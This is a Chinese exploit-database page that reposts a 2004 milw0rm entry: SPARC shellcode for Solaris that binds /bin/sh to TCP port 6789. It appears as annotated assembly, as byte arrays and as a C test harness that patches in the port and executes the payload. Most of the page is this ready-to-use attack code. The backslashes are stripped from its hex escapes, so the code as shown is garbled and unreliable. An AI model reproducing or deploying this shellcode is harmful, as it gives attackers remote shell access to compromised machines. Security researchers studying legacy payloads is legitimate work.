Solaris/SPARC – Bind (6789/TCP) Shell (/bin/sh) Shellcode (228 bytes)
漏洞ID | 1054638 | 漏洞类型 | |
发布时间 | 2004-09-26 | 更新时间 | 2004-09-26 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Solaris_SPARC | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
* Solaris shellcode - connects /bin/sh to a port
*
* Claes M. Nyberg 20020624
* <[email protected]>, <[email protected]>
*/
#include <string.h>
/**********************************************************************
void
main(void)
{
__asm__("
! Server address
xor %l1, %l1, %l1 ! l1 = 0
st %l1, [%sp - 12] ! 0 <=> INADDR_ANY
mov 0x2, %l1 ! AF_INET
sth %l1, [%sp -16] ! Server family
mov 0x30, %l1 ! High order byte of Port
sll %l1, 0x8, %l1 ! <<
or 0x39, %l1, %l1 ! Low order byte of port
sth %l1, [%sp - 14] ! Server port
! Address length
mov 0x10, %l1 ! 16, sizeof(struct sockaddr_in);
st %l1, [%sp -36] ! Length of address
! Create socket
mov 0x2, %o0 ! o0 = AF_INET
mov 0x2, %o1 ! o1 = SOCK_STREAM
xor %o2, %o2, %o2 ! o2 = 0
mov 0xe6, %g1 ! g1 = 230 = SYS_so_socket
ta 8 ! socket(AF_INET, SOCK_STREAM, 0);
add %o0, 0x1, %l0 ! l0 = server_fd +1
! Bind address to socket
sub %sp, 16, %o1 ! o1 = &server
mov 0x10, %o2 ! o2 = 16 = sizeof(struct sockaddr_in);
mov 232, %g1 ! g1 = 232 = SYS_bind
ta 8
! Listen
sub %l0, 0x1, %o0 ! o0 = server_fd
xor %o1, %o1, %o1 ! backlog = 0
mov 233, %g1 ! g1 = 233 = SYS_listen
ta 8
! Accept
sub %l0, 0x1, %o0 ! o0 = server_fd
sub %sp, 32, %o1 ! o1 = &client
sub %sp, 36, %o2 ! o2 = &addrlen
mov 234, %g1 ! g1 = 234 = SYS_accept
ta 8
add %o0, 0x1, %l0 ! l0 = client_fd
! Set up IO
sub %l0, 0x1, %o0 ! o0 = client_fd
mov 0x9, %o1 ! o1 = F_DUP2FD
xor %o2, %o2, %o2 ! o2 = 0 = STDIN_FILENO
mov 0x3e, %g1 ! g1 = 62 = SYS_fcntl
ta 8 ! fcntl(client_fd, F_DUP2FD, STDIN_FILENO);
sub %l0, 0x1, %o0 ! o0 = client_fd
mov 0x1, %o2 ! o2 = 1 = STDOUT_FILENO
ta 8 ! fcntl(client_fd, F_DUP2FD, STDOUT_FILENO);
sub %l0, 0x1, %o0 ! o0 = client_fd
mov 0x2, %o2 ! o2 = 1 = STDERR_FILENO
ta 8 ! fcntl(client_fd, F_DUP2FD, STDERR_FILENO);
! Execve /bin/sh
xor %o2, %o2, %o2 ! o2 = 0 => envp = NULL
set 0x2f62696e, %l0 ! lo = '/bin'
set 0x2f2f7368, %l1 ! l1 = '//sh'
st %o2, [%sp - 4] ! String ends with NULL
st %l1, [%sp - 8] ! Write //sh to stack
st %l0, [%sp - 12] ! Write /bin to stack
sub %sp, 12, %o0 ! o0 = &string
st %o2, [%sp - 16] ! argv[1] = NULL
st %o0, [%sp - 20] ! argv[0] = &string
sub %sp, 20, %o1 ! o1 = &string
mov 0x3b, %g1 ! g1 = 59 = SYS_execve
ta 8 ! execve(argv[0], argv, NULL);
! Exit
mov 1, %g1 ! g1 = 1 = SYS_exit
ta 8 ! exit();
");
}
**********************************************************************/
/* Index of low order byte for port */
#define P0 27
#define P1 19
static char solaris_code[] =
/* Server address */
"xa2x1cx40x11" /* xor %l1, %l1, %l1 */
"xe2x23xbfxf4" /* st %l1, [%sp - 12] */
"xa2x10x20x02" /* mov 2, %l1 */
"xe2x33xbfxf0" /* sth %l1, [%sp - 16] */
"xa2x10x20x30" /* mov 48, %l1 */
"xa3x2cx60x08" /* sll %l1, 8, %l1 */
"xa2x14x60x39" /* or %l1, 57, %l1 */
"xe2x33xbfxf2" /* sth %l1, [%sp - 14] */
/* Address length */
"xa2x10x20x10" /* mov 16, %l1 */
"xe2x23xbfxdc" /* st %l1, [%sp - 36] */
/* Create socket */
"x90x10x20x02" /* mov 2, %o0 */
"x92x10x20x02" /* mov 2, %o1 */
"x94x1ax80x0a" /* xor %o2, %o2, %o2 */
"x82x10x20xe6" /* mov 230, %g1 */
"x91xd0x20x08" /* ta 0x8 */
"xa0x02x20x01" /* add %o0, 1, %l0 */
/* Bind address to socket */
"x92x23xa0x10" /* sub %sp, 16, %o1 */
"x94x10x20x10" /* mov 16, %o2 */
"x82x10x20xe8" /* mov 232, %g1 */
"x91xd0x20x08" /* ta 0x8 */
/* Listen */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x92x1ax40x09" /* xor %o1, %o1, %o1 */
"x82x10x20xe9" /* mov 233, %g1 */
"x91xd0x20x08" /* ta 0x8 */
/* Accept */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x92x23xa0x20" /* sub %sp, 32, %o1 */
"x94x23xa0x24" /* sub %sp, 36, %o2 */
"x82x10x20xea" /* mov 234, %g1 */
"x91xd0x20x08" /* ta 0x8 */
"xa0x02x20x01" /* add %o0, 1, %l0 */
/* Set up IO */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x92x10x20x09" /* mov 9, %o1 */
"x94x1ax80x0a" /* xor %o2, %o2, %o2 */
"x82x10x20x3e" /* mov 62, %g1 */
"x91xd0x20x08" /* ta 0x8 */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x94x10x20x01" /* mov 1, %o2 */
"x91xd0x20x08" /* ta 0x8 */
"x90x24x20x01" /* sub %l0, 1, %o0 */
"x94x10x20x02" /* mov 2, %o2 */
"x91xd0x20x08" /* ta 0x8 */
/* Execve /bin/sh */
"x94x1ax80x0a" /* xor %o2, %o2, %o2 */
"x21x0bxd8x9a" /* sethi %hi(0x2f626800), %l0 */
"xa0x14x21x6e" /* or %l0, 0x16e, %l0 */
"x23x0bxcbxdc" /* sethi %hi(0x2f2f7000), %l1 */
"xa2x14x63x68" /* or %l1, 0x368, %l1 */
"xd4x23xbfxfc" /* st %o2, [%sp - 4] */
"xe2x23xbfxf8" /* st %l1, [%sp - 8] */
"xe0x23xbfxf4" /* st %l0, [%sp - 12] */
"x90x23xa0x0c" /* sub %sp, 12, %o0 */
"xd4x23xbfxf0" /* st %o2, [%sp - 16] */
"xd0x23xbfxec" /* st %o0, [%sp - 20] */
"x92x23xa0x14" /* sub %sp, 20, %o1 */
"x82x10x20x3b" /* mov 59, %g1 */
"x91xd0x20x08" /* ta 0x8 */
/* Exit */
"x82x10x20x01" /* mov 1, %g1 */
"x91xd0x20x08"; /* ta 0x8 */
static char _solaris_code[] =
"xa2x1cx40x11xe2x23xbfxf4xa2x10x20x02xe2x33xbfxf0"
"xa2x10x20x30xa3x2cx60x08xa2x14x60x39xe2x33xbfxf2"
"xa2x10x20x10xe2x23xbfxdcx90x10x20x02x92x10x20x02"
"x94x1ax80x0ax82x10x20xe6x91xd0x20x08xa0x02x20x01"
"x92x23xa0x10x94x10x20x10x82x10x20xe8x91xd0x20x08"
"x90x24x20x01x92x1ax40x09x82x10x20xe9x91xd0x20x08"
"x90x24x20x01x92x23xa0x20x94x23xa0x24x82x10x20xea"
"x91xd0x20x08xa0x02x20x01x90x24x20x01x92x10x20x09"
"x94x1ax80x0ax82x10x20x3ex91xd0x20x08x90x24x20x01"
"x94x10x20x01x91xd0x20x08x90x24x20x01x94x10x20x02"
"x91xd0x20x08x94x1ax80x0ax21x0bxd8x9axa0x14x21x6e"
"x23x0bxcbxdcxa2x14x63x68xd4x23xbfxfcxe2x23xbfxf8"
"xe0x23xbfxf4x90x23xa0x0cxd4x23xbfxf0xd0x23xbfxec"
"x92x23xa0x14x82x10x20x3bx91xd0x20x08x82x10x20x01"
"x91xd0x20x08";
int
main(void)
{
void (*code)() = (void *)_solaris_code;
_solaris_code[P0] = 0x85;
_solaris_code[P1] = 0x1a;
printf("Shellcode length: %dn", strlen(_solaris_code));
/* Shell on port 6789 */
code();
return(1);
}
// milw0rm.com [2004-09-26]
相关推荐: Microsoft Exchange 2000 Post Authorization License Exhaustion Denial Of Service Vulnerability
Microsoft Exchange 2000 Post Authorization License Exhaustion Denial Of Service Vulnerability 漏洞ID 1101647 漏洞类型 Failure to Handle …
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666